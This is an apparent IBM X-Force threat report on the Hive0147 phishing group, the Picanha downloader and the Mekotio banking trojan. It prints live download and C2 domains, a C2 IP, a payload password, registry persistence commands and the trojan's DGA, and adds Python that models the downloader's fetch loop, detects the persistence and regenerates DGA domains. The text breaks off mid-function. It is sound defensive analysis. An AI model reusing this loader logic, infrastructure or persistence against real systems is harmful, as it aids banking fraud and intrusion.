October 25, 2024 By nathan.toledo@ibm.com 17 min read

Hive0147 Serving Juicy Picanha With a Side of Mekotio

IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution.

After a 3-month break, Hive0147 returned in July with even larger campaign volumes and the debut of a new malicious downloader that X-Force has named “Picanha”, which is likely still under development and deploys the Mekotio banking trojan. Hive0147 also distributes other banking trojans, such as Banker.FN (also known as Coyote), and is likely affiliated with several other Latin American cybercrime groups operating different downloaders and banking trojans to enable banking fraud.

Key Findings: 

  • Hive0147 is one of the most active URL-based phishing threat actors targeting LATAM
  • Malware distributed by Hive0147 has led to a variety of banking trojans, including Banker.FN and Mekotio
  • X-Force discovered a new two-stage downloader named Picanha, which was used to facilitate a Mekotio infection
  • The Mekotio variant observed by X-Force targets a multitude of banking applications and uses DGA to resolve its C2 servers

LATAM Digital Landscape 

LATAM has increasingly become a highly targeted cyber threat landscape, specifically in Brazil and Mexico, where economies and industries show strong development. Evolving digital landscapes can be seen expanding into government services and financial technologies, including mobile banking. The 2023 Latin America E-commerce Blueprint found that e-commerce will grow steadily by at least 20% annually due to improved technology, innovations from online platforms, and the adoption of alternative payment methods. In 2023, 71% of adults in the region had a financial account, and it is estimated that between 2023 and 2026, 33 million new users will use the internet for the first time. Mobile channels dominate LATAM e-commerce, which spans retail as well as tax payments, fees and licenses, bill payments, and government services: since 2020, 70% of e-commerce transactions have been conducted over mobile channels. Conducting transactions over mobile channels gives users the flexibility to store credentials in digital wallets and initiate real-time bank transfers. For example, Brazil’s ‘Pix’ payment platform accounts for 16% of the region’s e-commerce transaction volume, and by 2026 Pix is estimated to account for 38% of online sales. With increasing digital developments in LATAM, specifically with e-commerce platforms, IBM X-Force assesses that malware distributors such as Hive0147 are taking advantage of this growth. Malware distributors operating within LATAM are increasing phishing campaign delivery in hopes of obtaining credentials, specifically banking credentials, for monetary gain. Throughout 2023, LATAM remained a highly impacted region, accounting for 12% of incident response cases supported by IBM X-Force. In 2023, entities in Brazil were most frequently targeted, making up 68% of all cases that IBM X-Force responded to in LATAM, while Colombia accounted for 17% and Chile for 8%.

IBM X-Force tracks several threat actors operating in LATAM, although attribution and clustering can be difficult due to overlapping tactics, techniques, and procedures (TTPs). Phishing campaigns within the LATAM region typically contain themes related to public service, government, taxes, and invoices, with the email bodies including either Portuguese or Spanish language content. Often, infection chains consist of multiple stages, starting with either PDF lures or URLs. Cloud-hosted payloads commonly observed in campaigns use platforms such as Azure Blob Storage (blob.core.windows.net), Azure (cloudapp.azure.com), Firebase Dynamic Links (app.goo.gl), GoDaddy (host.secureserver.net) and Google Cloud Run (run.app). When users click on one of the provided links, they are redirected and the download of a ZIP archive is initiated. Depending on the campaign, X-Force notes the ZIP files might contain one of the following file types: MSI, EXE, CMD, HTA or VBS. Executing the file inside the ZIP archive starts the infection chain. Some distributors are partial to specific malware families, such as BlotchyQuasar (Hive0129), Guildma and some Grandoreiro operators, while others use different payloads and a variety of forks. Frequently, the redirect links in email campaigns are geofenced, requiring the user to access them from within a specific LATAM country (most commonly Brazil, Mexico, or Colombia).

Hive0147 is one of the most active banking malware distributors that IBM X-Force currently observes operating in LATAM. IBM X-Force has been tracking a steady influx of campaigns grouped under Hive0147 delivering the banking trojan Banker.FN, as well as a new Golang-based downloader we have named “Picanha,” which deploys the well-known Mekotio banking trojan. Although we do not attribute this new downloader to Hive0147 specifically, IBM X-Force assesses that LATAM distributors operate under a similar model to other cybercrime groups, with affiliate groups specializing in spamming, malware staging or crypting, and banking trojan operations and monetization.

Hive0147 Distribution Activity

Most of Hive0147’s emails are sent from French IP addresses, although there has been a recent shift to emails being sent almost exclusively from Dutch IP addresses. Shifting the location of sender IP addresses may be an attempt to evade detection, prevent IP blocking, or complicate attribution. Interestingly, of the campaign activity observed since January, IBM X-Force found that about half of the emails pass DomainKeys Identified Mail (DKIM) verification. DKIM is a method in which the sending domain cryptographically signs a message so that the receiver can verify that it was sent by a holder of that domain’s signing key and was not altered in transit. A passing signature says nothing about intent: an actor who controls the sending domain, or who sends through a mail service that signs on its behalf, obtains a valid DKIM signature just like a legitimate sender. Emails with successful DKIM checks are therefore less likely to be flagged as spam. For Hive0147, failed DKIM checks may have been a misconfiguration on the actor’s part, or the result of using different services or infrastructure that do not support DKIM.

During phases of activity, IBM X-Force has observed Hive0147 exhibit a significantly higher volume of activity than other LATAM malware distributors. Since January 2024, activity attributed to Hive0147 has occurred on every day of the week; however, it mainly occurs Monday to Thursday, with 80% of campaign emails sent on these days. Interestingly, from April to July, we saw an almost complete stop in activity, which may be the result of higher-than-normal domestic travel. Brazil’s travel industry is growing rapidly, as can be seen in the increase in both domestic and international air traffic. The National Civil Aviation Agency (ANAC) reported a 4.4% increase in flight passenger traffic between January and June 2024, recording 56.2 million passengers. In addition, the International Air Transport Association (IATA) reported that in July 2024, domestic tourism in Brazil grew a substantial 8.9%.

Figure 1 Hive0147 Active Campaign Days

Figure 2 Hive0147 Top Six IP Usage by Country

Figure 3 Hive0147 DKIM Success and Permanent_error

Hive0147 and Banker.FN

IBM X-Force has been tracking and clustering a series of campaigns as Hive0147 since 2023, which have been delivering the banking trojan Banker.FN. Banker.FN is a .NET-based banking trojan first reported in early 2023, with activity dating back to at least September 2022. Since then, Banker.FN has received several updates with added functionality.

Banker.FN is able to:

  • Exfiltrate sensitive information
  • Enumerate active banking websites
  • Display fake logins and multi-factor authentication windows 

IBM X-Force attributes campaigns delivering Banker.FN to Hive0147 with medium confidence, as activity can be difficult to delineate from other LATAM distributors due to TTP overlaps. IBM X-Force considers the reported Banker.FN campaigns from July 2023 to likely November 2023 as Hive0147 operations. 

Campaign Elements Between July-November 2023:

  • Emails: sent during the week (per X-Force observation or per ZIP file compile dates)
  • Cloud-hosted payloads: X-Force observed goo.gl URLs, or unknown
  • ZIP download: yes
  • Use of Electron app: yes
  • Installer: NSIS, transitioning to Squirrel
  • NIM loader: yes
  • Filenames: all similar, containing variations and combinations of “PDF”, “Fatur”, “Mensal”, “doc”

Distribution Disguised as Electron App

In late July-August 2023, X-Force observed Banker.FN version 1.0.0.89 being distributed in high-volume email campaigns. Campaigns were active during the weekdays, targeting users in Brazil with emails written in themes related to invoices and deliveries. Emails contained an embedded “app.goo[.]gl” link, redirecting users to Firebase dynamic links to download a malicious Electron app acting as a loader. Upon installation, the loader goes through several infection stages including a Nim-compiled crypter to stealthily inject the final payload. The banking trojan is then able to exfiltrate sensitive information, enumerate active banking websites, and display fake logins and multi-factor authentication windows. 


Figure 4 Examples of Fake Multi-Factor Authentication Windows

Abusing the Squirrel Installer

IBM X-Force observed the distribution of Banker.FN again in late August 2023, this time with emails posing as DocuSign notifications. Although emails were sent Friday to Monday, most were delivered on Friday. The campaign targeted Portuguese-speaking users and directed the recipient to review and sign a document by clicking on a Firebase dynamic link. The victim is then redirected to a dropper site, which downloads a ZIP file onto the victim machine. The downloaded ZIP archive contains an executable posing as a PDF file, which is a malicious Electron app built into a Squirrel.Windows installer. Upon execution, it installs its malicious components, establishes persistence, detects virtual environments, and decrypts the next stage before executing it via DLL hijacking. 

Figure 5 Sample Email

The Electron app built into a Squirrel.Windows installer is a slight change from the previous campaign, where the Electron app was built into an NSIS installer. The app, however, is built the same way and contains an obfuscated JavaScript installer that checks for common virtual machine environments before establishing persistence and decrypting an archive containing another trojanized application. The trojanized application executes a legitimate executable, which in turn executes a bloated malicious loader via DLL hijacking, continuing the attack execution. This campaign continues the use of a Nim-compiled loader, now with more advanced techniques such as direct syscalls. 

Further reports made public in February and July 2024 detail campaigns, likely occurring in late 2023, delivering a purportedly new malware named “Coyote”; however, the malware is the banking trojan first discovered by ESET and called Banker.FN. The infection chain in both campaigns involves the Squirrel installer for malware distribution, as well as NodeJS and the Nim loader. 

“Picanha” and The Role of Downloaders in the Banking Trojan Ecosystem

The ecosystem of LATAM banking trojans is unique in comparison to other cybercrime operations. It is one of the only regions in which banking trojans are still used heavily to commit banking fraud, while most other banking trojans have since moved on to become backdoors and botnets to furnish ransomware attacks. The threat groups operating out of LATAM and Spain also display a high degree of cross-group collaboration, while sticking to their tried-and-true techniques, seldom found in other regions. Although this does help to quickly identify a “Latin American banking trojan” group or campaign, attribution is often very challenging due to the strong overlaps. Different malware strains will often use similar string encryption algorithms, and several banking trojans are believed to be operated as Malware-as-a-Service or have several independently developed and operated forks. The same applies to the malware distributors, which mainly rely on shared techniques such as public cloud hosting, and phishing emails containing PDFs and malicious URLs to download ZIP archives containing the first stage malware. 

In most cases, the first stage is a downloader type malware. These come in all shapes and sizes and can have varying levels of complexity. A large portion of downloaders are script based, often featuring lengthy infection chains made up of Batch, JavaScript, Visual Basic Script or PowerShell scripts, and the scripts themselves may also be embedded in files such as HTML, LNK (Guildma especially), or MSI installers. The more complex downloaders often support some very basic enumeration on the host, which they pass back to their C2/download server in order to notify the operators of the potential value of an infection. One example is the Grandoreiro downloader, a member of the Grandoreiro family, which features its own string encryption and performs detailed enumeration before downloading the main banking trojan.

Other downloaders are more generic but are also used to download banking trojans such as Grandoreiro. What the latter have in common is that they almost always download a full archive containing a legitimate application, with the malware hidden in a trojanized DLL which is loaded by the application upon execution. The reason for this method of packaging and distribution is that any potentially suspicious activity performed by the banking trojan appears to EDR solutions as if it is coming from a legitimate executable’s process. This recurring technique is characteristic of the LATAM ecosystem and has been a distinctive feature for several years. In mid-2024, IBM X-Force observed a campaign delivering a new downloader exhibiting the same characteristics. X-Force named the new Golang-based downloader “Picanha.”

The Picanha downloader is the next evolution of this malware type, offering enhanced features such as supporting more download URLs, reliable encryption, and a more sophisticated in-memory execution mechanism, surpassing previous downloader capabilities. However, the builder for Picanha, which is responsible for creating the random function names and other values, is likely still under development. Frequent code changes, such as bugfixes, and the presence of unused configuration values, may further indicate that future versions could include additional features such as persistence for the downloaded payload. 

Picanha downloader

In July 2024, IBM X-Force observed an email campaign using the new Golang-based downloader Picanha to deliver the Mekotio banking trojan. The initial phishing email is in Portuguese and targets employees, informing them of an apparent change in the number of vacation days they have. This theme directly threatens employees’ well-being, and the sense of urgency may lead victims to impulsively click on the included URL to view the changes. 

Figure 6 Sample Phishing Email

As in previous campaigns targeting LATAM entities, the URL uses Google’s Cloud Run service and redirects victims to a site to download a ZIP file containing a malicious executable. The new Golang-based malware “Picanha downloader” consists of two stages. 

Stage 1

Notably, the first stage of the Golang executable retains its function names; however, these have been selected randomly for each sample from a Portuguese wordlist, so they carry no meaning:

Figure 7 Wordlist

First, Picanha executes a function designed to imitate a Sleep call. The function calculates the elapsed time and performs random calculations until a randomly chosen threshold is reached, which takes between 25 seconds and 3 minutes. Because the Sleep API is never called, this busy-wait is likely intended to hinder sandboxes and detection engines that hook Sleep and skip over dormant periods.

Then, Picanha decrypts its configuration, which is stored as a hardcoded hex string encrypted with AES-256-GCM. 

Figure 8 Encrypted Configuration

The decrypted configuration string contains values delimited by the characters “#” and “|”:

dyicn.ofertadsn.com.br#hzfzx.khadicomunicacao.com.br#zpguk.cozinhaofertas.com#ljoea.curasdanatureza.com#tjqty.deccsmagazine.com.br#sohye.topracoes.com#jmaah.clicktelefoniaempresarial.com.br#izlhu.ometodoseroficial.com#khqry.vitapronobisfassolution.com.br#olukv.familyrealstore.com#################|C:\Program Files\Topaz OFD\Warsaw|reg=Software\Microsoft\Windows\CurrentVersion\Run|\Microsoft\Windows|secretores

The decrypted configuration consists of:

  • 10 different download domains
  • The file path of Topaz OFD – an online banking security app popular in Latin America
  • A registry key commonly used for persistence – currently unused
  • The relative path “\Microsoft\Windows” – currently unused
  • A random word used as the name of the folder to store the payload

Picanha will then create a new folder in a randomly chosen folder within the %LOCALAPPDATA% directory. For the analyzed sample based on the above config, the folder would be named “secretores.” 

Next, the malware enters a loop and attempts to connect to each of the 10 embedded download domains until one is successful. Between the requests, the malware sleeps in random intervals. For each domain, it constructs a full URL and attempts to download a payload. If the request is successful, it will parse the payload as a ZIP archive and extract the contents into the newly created directory. 

Figure 9 Loop Attempting Connections to Embedded Domains

After that, the malware checks whether the Topaz OFD banking security module is installed by verifying that the path “C:\Program Files\Topaz OFD\Warsaw” exists on the system. Depending on the result, Picanha issues a second HTTP GET request to one of the following URLs, using the same domain as for the ZIP download:

https://<domain>/N -> Topaz OFD not installed
https://<domain>/S -> Topaz OFD installed

Finally, Picanha launches the main executable which was extracted from the ZIP archive. As often seen with infection chains of related banking trojans, the main executable is a legitimate application which loads a trojanized DLL, in this case, named NsBars.dll

In the example above, the extracted archive contains innocuous files related to the legitimate application and the following three files used for the next steps of the infection chain:

Relative path | Description | SHA256
.\Textoescritor.exe | Legitimate application | 39222481d69aa4d92a5c4d5c094a86909ebff762f6336f1a186fa94d3cc01012
.\bin\NsBars.dll | Malicious DLL (Picanha stage 2), replacing the original NsBars.dll | 4e62a102a00b071ee9f7b7e6ace0d558e18ba1a61a937676c4460a0f33a3e87e
.\wFHYfjQNzkoG.dat | Encrypted Mekotio payload | 18b09a8dfb6b553f355382127a67ad1ba5909b442e0e9fadb7ebd7d89675ea9b

Picanha’s first stage terminates after executing Textoescritor.exe. The legitimate application goes on to load a series of user DLLs from the “bin” subdirectory, including the trojanized NsBars.dll. When NsBars.dll is loaded, the export function “BarCreate” is called. The code in this function is responsible for executing the second stage of Picanha. 
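As an added example (not Picanha’s own code and not from the report), the following Python models the stage 1 logic described above so that an analyst can replay it against a decrypted configuration: parse the “#”/“|”-delimited config, walk the download domains until one returns a valid ZIP, pick out the three components inside the archive, and form the Topaz OFD report URL. The fetch function and the ZIP contents are constructed for the example, the URL path requested on each download domain is an assumption (the report does not state it), and the random sleeps between attempts are omitted; the config layout, the /N and /S paths and the three file names come from the analysis.

```python
import io
import os
import zipfile
from dataclasses import dataclass
from typing import Callable, Optional

# Decrypted configuration quoted in the report (the real sample stores it as an
# AES-256-GCM-encrypted hex string; that decryption is out of scope here).
SAMPLE_CONFIG = (
    "dyicn.ofertadsn.com.br#hzfzx.khadicomunicacao.com.br#zpguk.cozinhaofertas.com#"
    "ljoea.curasdanatureza.com#tjqty.deccsmagazine.com.br#sohye.topracoes.com#"
    "jmaah.clicktelefoniaempresarial.com.br#izlhu.ometodoseroficial.com#"
    "khqry.vitapronobisfassolution.com.br#olukv.familyrealstore.com#################"
    r"|C:\Program Files\Topaz OFD\Warsaw|reg=Software\Microsoft\Windows\CurrentVersion\Run"
    r"|\Microsoft\Windows|secretores"
)


@dataclass
class PicanhaConfig:
    domains: list        # download domains, tried in order
    topaz_path: str      # Topaz OFD install path to test for
    run_key: str         # registry Run key (unused by the analyzed sample)
    relative_path: str   # "\Microsoft\Windows" (unused by the analyzed sample)
    folder_name: str     # payload folder name created under %LOCALAPPDATA%


def parse_config(decrypted: str) -> PicanhaConfig:
    """Split on '|' for the five sections and on '#' for the domain list.
    The sample reserves more '#' slots than it fills, so empty slots are dropped."""
    sections = decrypted.split("|")
    if len(sections) != 5:
        raise ValueError(f"expected 5 '|'-delimited sections, got {len(sections)}")
    domain_list, topaz_path, reg, relative_path, folder_name = sections
    if not reg.startswith("reg="):
        raise ValueError("third section does not start with 'reg='")
    domains = [d for d in domain_list.split("#") if d]
    return PicanhaConfig(domains, topaz_path, reg[len("reg="):], relative_path, folder_name)


def fetch_first_payload(domains, fetch: Callable[[str], Optional[bytes]], payload_path="/"):
    """Stage 1's download loop: try each domain in order and return (domain, zip_bytes)
    for the first response that parses as a ZIP archive, or (None, None).
    `payload_path` is an assumption; the report does not give the URL path."""
    for domain in domains:
        data = fetch(f"https://{domain}{payload_path}")
        if data and zipfile.is_zipfile(io.BytesIO(data)):
            return domain, data
    return None, None


def topaz_report_url(domain: str, topaz_installed: bool) -> str:
    """Second GET: /S if 'C:\\Program Files\\Topaz OFD\\Warsaw' exists, else /N."""
    return f"https://{domain}/" + ("S" if topaz_installed else "N")


def classify_archive(zip_bytes: bytes) -> dict:
    """Pick out the three components the report describes: a top-level EXE (legitimate
    host), bin/NsBars.dll (Picanha stage 2) and a top-level .dat blob (encrypted Mekotio)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    top = [n for n in names if "/" not in n]
    return {
        "exe": [n for n in top if n.lower().endswith(".exe")],
        "nsbars_dll": [n for n in names if n.lower() == "bin/nsbars.dll"],
        "dat": [n for n in top if n.lower().endswith(".dat")],
    }


def build_sample_zip() -> bytes:
    """Constructed stand-in for the real archive: same file layout, dummy contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Textoescritor.exe", b"MZ" + b"\x00" * 62)  # placeholder, not the real binary
        zf.writestr("bin/NsBars.dll", b"MZ" + b"\x00" * 62)
        zf.writestr("wFHYfjQNzkoG.dat", os.urandom(64))
        zf.writestr("readme.txt", b"innocuous file shipped with the legitimate app")
    return buf.getvalue()


def demo_fetch(domains):
    """Constructed network stand-in: the first two domains are 'down', the third serves
    the sample ZIP, which is exactly the situation the retry loop exists for."""
    serving = domains[2]

    def fetch(url: str) -> Optional[bytes]:
        return build_sample_zip() if url.startswith(f"https://{serving}/") else None
    return fetch


def run_demo() -> dict:
    cfg = parse_config(SAMPLE_CONFIG)
    domain, payload = fetch_first_payload(cfg.domains, demo_fetch(cfg.domains))
    # A real stage 1 extracts into %LOCALAPPDATA%\<random folder>\secretores and then
    # launches the EXE; here the archive is only inspected in memory.
    return {
        "folder": cfg.folder_name,
        "served_by": domain,
        "components": classify_archive(payload),
        "report_url": topaz_report_url(domain, topaz_installed=False),
    }


if __name__ == "__main__":
    print(run_demo())
```

The same parse-and-classify steps apply to a config recovered from a different sample: a build that changes the domain count or the folder name still splits the same way, and an archive that lacks the bin/NsBars.dll entry is a sign the loader variant has changed.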

Stage 2

Picanha’s second stage starts with the decryption of the final payload (Mekotio), which requires two arguments to proceed:

  1. The filename of the encrypted payload “wFHYfjQNzkoG.dat”
  2. A decryption password “hNWzPAsZVruI”

The final payload is decrypted in memory using the SHA256 hash of the password as a key for the AES-256-GCM algorithm. 

Finally, the address of the decrypted Mekotio payload is passed to a loader function to manually map the binary into a new buffer in memory and resolve its imports. The loader function retrieves the entry point of the Mekotio payload and transfers execution to it.

Mekotio banking trojan

The Mekotio banking trojan is a Delphi-compiled executable, in this case a 64-bit DLL. Execution begins in the main class with the FormCreate function which attempts to retrieve handles to the following DLLs used by banking security applications: 

  • wslbscr32.dll
  • wslbscrwh32.dll
  • RapportGH.dll
  • rooksbas.dll
  • rooksdol.dll

If they are already loaded into memory, Mekotio attempts to unload the DLLs by calling DllMain with the DLL_PROCESS_DETACH parameter. However, a simple error in the code causes this functionality to fail, because one encrypted string is never passed through its decryption function:

Figure 10 Decryption Function

The next interesting piece of code uses SetSecurityInfo to modify the discretionary access control list (DACL) of its process, setting it to a new empty DACL. 

Figure 11 Empty DACL

This prevents Windows 7 users from using Windows Task Manager to terminate the process.

Figure 12 Error Message

However, an elevated (Administrator) Task Manager can still terminate the process, and the technique does not work on Windows 8.1 and above. 

Mekotio also loads two DLLs needed during execution, “Magnification.dll” and “dwmapi.dll”. Finally, the malware begins its enumeration procedure and initiates command and control (C2) communication. Like most other Delphi-based banking trojans, the different classes and functions implementing the various features of the malware are scheduled via Delphi Timer objects. 

Persistence

Upon execution, Mekotio establishes persistence using a registry value that userinit.exe treats as a logon script. It writes the path of the running executable (the legitimate binary loading the Picanha stage 2 DLL) to the following value, causing Mekotio to execute immediately after every login. At the same time a file “maisum2.dat” is dropped into the current directory as an indicator that persistence was established successfully.

HKEY_CURRENT_USER\Environment\UserInitMprLogonScript

In addition, Mekotio is able to accept a C2 command requesting to establish persistence through another registry key. In that case, the banking trojan runs cmd.exe with the “REG ADD” command to write the same path to:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
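As an added example (not from the report), the following Python shows the detection logic a SOC would run over endpoint registry telemetry for the two locations above: any write to UserInitMprLogonScript, a Run value whose target lives under %LOCALAPPDATA%, and the cmd.exe/REG ADD variant the C2 command produces. The events are constructed in a flat name=value form for the example (field names follow Sysmon’s registry-set and process-creation events, but the format, host names, SIDs and paths are made up); only the two registry locations and the “legitimate EXE in a %LOCALAPPDATA% folder” pattern come from the analysis.

```python
import re

LOGON_SCRIPT = r"\environment\userinitmprlogonscript"
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"
LOCALAPPDATA = "\\appdata\\local\\"

# Constructed events: Sysmon-like field names, made-up values.
EVENTS = [
    r"EventID=13 Image=C:\Users\ana\AppData\Local\Temp\secretores\Textoescritor.exe "
    r"TargetObject=HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Environment\UserInitMprLogonScript "
    r"Details=C:\Users\ana\AppData\Local\Temp\secretores\Textoescritor.exe",
    r"EventID=13 Image=C:\Windows\System32\reg.exe "
    r"TargetObject=HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\Textoescritor "
    r"Details=C:\Users\ana\AppData\Local\Temp\secretores\Textoescritor.exe",
    r"EventID=13 Image=C:\Program Files\Vendor\Updater.exe "
    r"TargetObject=HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater "
    r"Details=C:\Program Files\Vendor\Updater.exe",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe "
    r"ParentImage=C:\Users\ana\AppData\Local\Temp\secretores\Textoescritor.exe "
    r"CommandLine=cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
    r"/v Textoescritor /t REG_SZ /d C:\Users\ana\AppData\Local\Temp\secretores\Textoescritor.exe /f",
]

# 'Name=value' fields; a value may contain spaces but never the token ' Name='.
FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> dict:
    return {m.group(1): m.group(2) for m in FIELD.finditer(line)}


def evaluate(event: dict) -> list:
    """Return (severity, reason) findings for one parsed event."""
    findings = []
    event_id = event.get("EventID")
    if event_id == "13":  # registry value set
        target = event.get("TargetObject", "").lower()
        details = event.get("Details", "").lower()
        image = event.get("Image", "").lower()
        if target.endswith(LOGON_SCRIPT):
            # Legitimate use of this logon-script value is rare; it is Mekotio's primary persistence.
            findings.append(("high", "UserInitMprLogonScript set"))
        elif RUN_KEY in target and LOCALAPPDATA in details:
            findings.append(("medium", "Run value points to an executable under %LOCALAPPDATA%"))
        if RUN_KEY in target and image.endswith("\\reg.exe"):
            findings.append(("low", "Run key written through reg.exe (matches the C2-commanded REG ADD)"))
    elif event_id == "1":  # process creation
        cmd = event.get("CommandLine", "").lower()
        if "reg" in cmd and " add " in cmd and "currentversion\\run" in cmd and LOCALAPPDATA in cmd:
            findings.append(("medium", "cmd.exe REG ADD to a Run key targeting %LOCALAPPDATA%"))
    return findings


def scan(lines) -> list:
    """Return [(line_index, severity, reason)] for every finding over all lines."""
    out = []
    for idx, line in enumerate(lines):
        for severity, reason in evaluate(parse_event(line)):
            out.append((idx, severity, reason))
    return out


if __name__ == "__main__":
    for idx, severity, reason in scan(EVENTS):
        print(f"event {idx}: {severity}: {reason}")
```

The third constructed event (a vendor updater registering itself under Program Files) produces no finding, which is the point of keying the Run-key rule on the %LOCALAPPDATA% target rather than on Run-key writes in general.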

Command and control

Mekotio begins its first C2 connection with an HTTP POST request, sending an encrypted string containing basic enumeration data on the newly infected client. For example:

dqbw802=7mvejj3zfwoD5880AhFzv62fA3n7sz8oB4nBoAB3Da&Bcdv2=D929321e3a0651A0ae94b2979e&by4ps8=067DAF75a59388eb63d56AD1474EB73F&40z0uuE=9034F4&y1ry=86FD5dF9&h5i2c8cD3=F37c8880819a78d86bF55BE04e&5c9mt=&zwCbcq=6E8389839392D52FEA31D356C73bA429ac53&83whhjc=&

The data is formatted using the following pattern:

<random_string>=<value1>&<random_string>=<value2>&<random_string>=<value3>…

The first value is a randomly generated 42-character key, which decrypts all other values using the standard Mekotio string encryption algorithm. The encrypted values contain the following system information:

  • Computer name
  • Username
  • Windows version
  • Mekotio version string “D22”
  • Installed security software (Topaz OFD, Trusteer, Banco Bradesco “Componentes de Segurança”)
  • Installed anti-virus software

The analyzed sample does not contain a valid URL, which in turn causes the C2 request to fail. As often observed in related banking trojans, this might well be a deprecated functionality not properly cleaned up.

DGA

The rest of the banking trojan’s functionality uses one of two DGA mechanisms to generate a domain and resolve its C2 server. Afterwards, the actual Mekotio C2 communication is performed via Windows Sockets.

The first DGA mechanism, when the DGA mode configuration value is set to 1, generates a new domain based on the following data:

  1. Day of the month
  2. Month of the year
  3. Hardcoded seed “mkro”

The resulting strings are then concatenated. For September 16th for instance, the result is “1609mkro.”

For a DGA mode set to 2, Mekotio also incorporates the hour of the day within a specific period. The following time frames are mapped to a specific string:

Time is less than | Mapped string
07:00:00 | “AM01”
08:00:00 | “AM02”
09:00:00 | “AM03”
10:00:00 | “AM04”
11:00:00 | “AM05”
12:00:00 | “AM06”
13:00:00 | “PM01”
14:00:00 | “PM02”
15:00:00 | “PM03”
16:00:00 | “PM04”
17:00:00 | “PM05”
18:00:00 | “PM06”

The second DGA method then concatenates the following data, including the mapped time-frame string:

  1. Day of the week
  2. Day of the month
  3. Timeframe string
  4. Hardcoded seed “mkro”

As a result, the second DGA method would form the string “MON16AM04mkro” for the date and time “September 16th at 09:42.”

From this point, both methods are the same. They generate an MD5 hash of the concatenated string and use the first 20 characters as a subdomain. The apex domain is retrieved using a list that corresponds to the current day of the month:

01 blogdns[.]com
02 blogdns[.]net
03 blogdns[.]org
04 blogsite[.]org
05 webhop[.]biz
06 webhop[.]info
07 dnsalias[.]com
08 dnsalias[.]net
09 dnsalias[.]org
10 dnsdojo[.]com
11 doesntexist[.]com
12 doesntexist[.]org
13 dontexist[.]com
14 dontexist[.]net
15 dontexist[.]org
16 doomdns[.]com
17 doomdns[.]org
18 dvrdns[.]org
19 dyn-o-saur[.]com
20 dynalias[.]com
21 dynalias[.]net
22 dynalias[.]org
23 dynathome[.]net
24 endofinternet[.]net
25 endofinternet[.]org
26 endoftheinternet[.]org
27 webhop[.]org
28 issmarterthanyou[.]com
29 neat-url[.]com
30 from-ks[.]com
31 dyndns-remote[.]com

For both methods explained above, the final C2 domains are:

3cd99dd0981c76e5a7b9[.]doomdns[.]com
4e342df890dd9fb169e0[.]doomdns[.]com

Mekotio also supports a C2 mode of 0, which is likely meant as a fallback or testing channel and uses a hardcoded IP address as the C2 server:

177.235.219[.]126
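As an added example (not Mekotio’s own code), the following Python re-implements the two DGA modes described above and precomputes every domain the sample could resolve on a given day, which is what the DNS-blocking recommendation at the end of this report needs. The report’s single worked example is the only reference, so three details are assumptions: the weekday is an uppercase English three-letter abbreviation, day and month are zero-padded, and the MD5 digest is lowercase hex. The report does not define a time-slot string for 18:00 and later, so mode 2 refuses those hours rather than guessing. Output domains are not defanged.

```python
import hashlib
from datetime import datetime, time, timedelta

SEED = "mkro"
# Weekday form inferred from the report's single example ("MON16..."); datetime.weekday() has Monday == 0.
DAY_OF_WEEK = ["MON", "TUE", "WED", "THU", "FRI", "SAT", "SUN"]

# Apex domain per day of month, as listed in the report (defanging removed).
APEX_BY_DAY = {
    1: "blogdns.com", 2: "blogdns.net", 3: "blogdns.org", 4: "blogsite.org",
    5: "webhop.biz", 6: "webhop.info", 7: "dnsalias.com", 8: "dnsalias.net",
    9: "dnsalias.org", 10: "dnsdojo.com", 11: "doesntexist.com", 12: "doesntexist.org",
    13: "dontexist.com", 14: "dontexist.net", 15: "dontexist.org", 16: "doomdns.com",
    17: "doomdns.org", 18: "dvrdns.org", 19: "dyn-o-saur.com", 20: "dynalias.com",
    21: "dynalias.net", 22: "dynalias.org", 23: "dynathome.net", 24: "endofinternet.net",
    25: "endofinternet.org", 26: "endoftheinternet.org", 27: "webhop.org",
    28: "issmarterthanyou.com", 29: "neat-url.com", 30: "from-ks.com", 31: "dyndns-remote.com",
}

# Mode 2 time slots as (exclusive upper bound, label), in the report's order.
SLOTS = list(zip(
    [time(h, 0) for h in range(7, 19)],
    ["AM01", "AM02", "AM03", "AM04", "AM05", "AM06",
     "PM01", "PM02", "PM03", "PM04", "PM05", "PM06"],
))


def time_slot(hour: int, minute: int = 0) -> str:
    """Map a time of day to the slot string: 'AM01' below 07:00 up to 'PM06' below 18:00."""
    t = time(hour, minute)
    for upper, label in SLOTS:
        if t < upper:
            return label
    raise ValueError("the report does not document the slot string for 18:00:00 and later")


def seed_string(year: int, month: int, day: int, hour: int = 0, minute: int = 0, mode: int = 1) -> str:
    """The string that gets hashed: DDMM + seed (mode 1) or DOW + DD + slot + seed (mode 2)."""
    dt = datetime(year, month, day, hour, minute)  # also validates the date
    if mode == 1:
        return f"{dt.day:02d}{dt.month:02d}{SEED}"
    if mode == 2:
        return f"{DAY_OF_WEEK[dt.weekday()]}{dt.day:02d}{time_slot(hour, minute)}{SEED}"
    raise ValueError("mode must be 1 or 2; mode 0 uses the hardcoded fallback IP instead")


def c2_domain(year: int, month: int, day: int, hour: int = 0, minute: int = 0, mode: int = 1) -> str:
    """First 20 hex characters of MD5(seed string) as a subdomain of the day's apex domain."""
    digest = hashlib.md5(seed_string(year, month, day, hour, minute, mode).encode("ascii")).hexdigest()
    return f"{digest[:20]}.{APEX_BY_DAY[day]}"


def daily_blocklist(year: int, month: int, day: int) -> list:
    """Every domain the sample could resolve that day: one for mode 1 plus one per
    documented slot for mode 2 (13 in total), sorted for a DNS RPZ or sinkhole feed."""
    domains = {c2_domain(year, month, day, mode=1)}
    for upper, _ in SLOTS:
        inside = datetime(year, month, day, upper.hour, upper.minute) - timedelta(minutes=1)
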